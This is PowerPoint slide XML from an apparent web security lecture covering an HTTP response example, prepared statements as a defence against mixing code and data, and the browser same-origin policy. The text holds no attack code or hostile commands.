            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF517456-CB06-2545-826D-F8FA458C09D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4571999" y="5751879"/>
            <a:ext cx="2159000" cy="657860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>RESPONSE:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP/1.0 200</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED3571D3-F056-F240-94EC-C2E6F712FBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7414478" y="4415435"/>
            <a:ext cx="1589441" cy="2090736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123C9F70-195A-5C4B-9CF8-F8A583412A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165337" y="4842020"/>
            <a:ext cx="929294" cy="1731915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3290E6F6-876A-8E4F-94A5-F217FEF01E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2295524" y="4414520"/>
            <a:ext cx="774700" cy="320601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8B300D-F4C1-C040-84AF-CDA0934FFC97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142999" y="4004355"/>
            <a:ext cx="1132840" cy="130810"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1132839" h="130810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1132731" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132731" y="130764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="130764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC816D8-718D-614E-8FB9-549261075B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190624" y="3966946"/>
            <a:ext cx="1917700" cy="177800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>safebank.com/account.html</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299438210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6BE9C4-0365-594D-ADFC-BF11D0C27ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Prepared Statement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91C3D1D-B32A-6441-8EB7-630B0CD015DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8763000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerable version with code and data mixed together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure version with prepared statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771EA18B-53DA-1842-AA32-89A90B80FCA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="35104" t="45000" r="25938" b="44074"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2743200"/>
            <a:ext cx="6735929" cy="1062620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EDE869-70C1-484A-A0DC-A7C7EEA9A224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="34687" t="58832" r="25958" b="12434"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4482534"/>
            <a:ext cx="5784225" cy="2375466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A68E594-01E5-A64C-9DC1-A672124CD4B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775200" y="5007841"/>
            <a:ext cx="1356462" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>send code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73968F2A-4245-474B-8E1F-070E64404DE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6775200" y="5398065"/>
            <a:ext cx="1326004" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>send data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5E932C-9A70-484E-A538-091E1D6488C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5665360" y="5192507"/>
            <a:ext cx="1109840" cy="23550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149AEB16-B945-184A-A9C4-669A86607F4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5665360" y="5582731"/>
            <a:ext cx="1109840" cy="769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CE06498F-10E1-3B49-8E07-B46831FBDB52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776061" y="5788288"/>
            <a:ext cx="1921232" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>start execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B20DBD35-971B-F34C-B40A-BD648A3CCA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5634819" y="5720380"/>
            <a:ext cx="1141242" cy="25257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1355890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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5DB4FC-2855-DB42-9072-55BD7E0D1693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="259080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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security: Client Side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386622503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04AB45-AEEE-2749-A44C-B6A5CCE9773A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{301E83B7-026F-2848-A62D-0FAA9A4DD169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent a malicious site from spying on or tampering with user information or  interactions with other websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>nforeced by browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143753741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7405EA-30AA-AF41-8E64-F9FF80ABF83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9028BC8C-330D-E34E-A0C5-DDF9C45B89CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Policy 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each site in the browser is isolated from all others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Policy 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple pages from the same site are not isolated</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384961189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1C1B35-5F89-8B4B-9F89-B05DE3678A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E327996-E3AE-BD47-A8C8-B1CC0EEFA588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin = Protocol + Hostname + Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137731692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1C1B35-5F89-8B4B-9F89-B05DE3678A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E327996-E3AE-BD47-A8C8-B1CC0EEFA588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin = Protocol + Hostname + Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
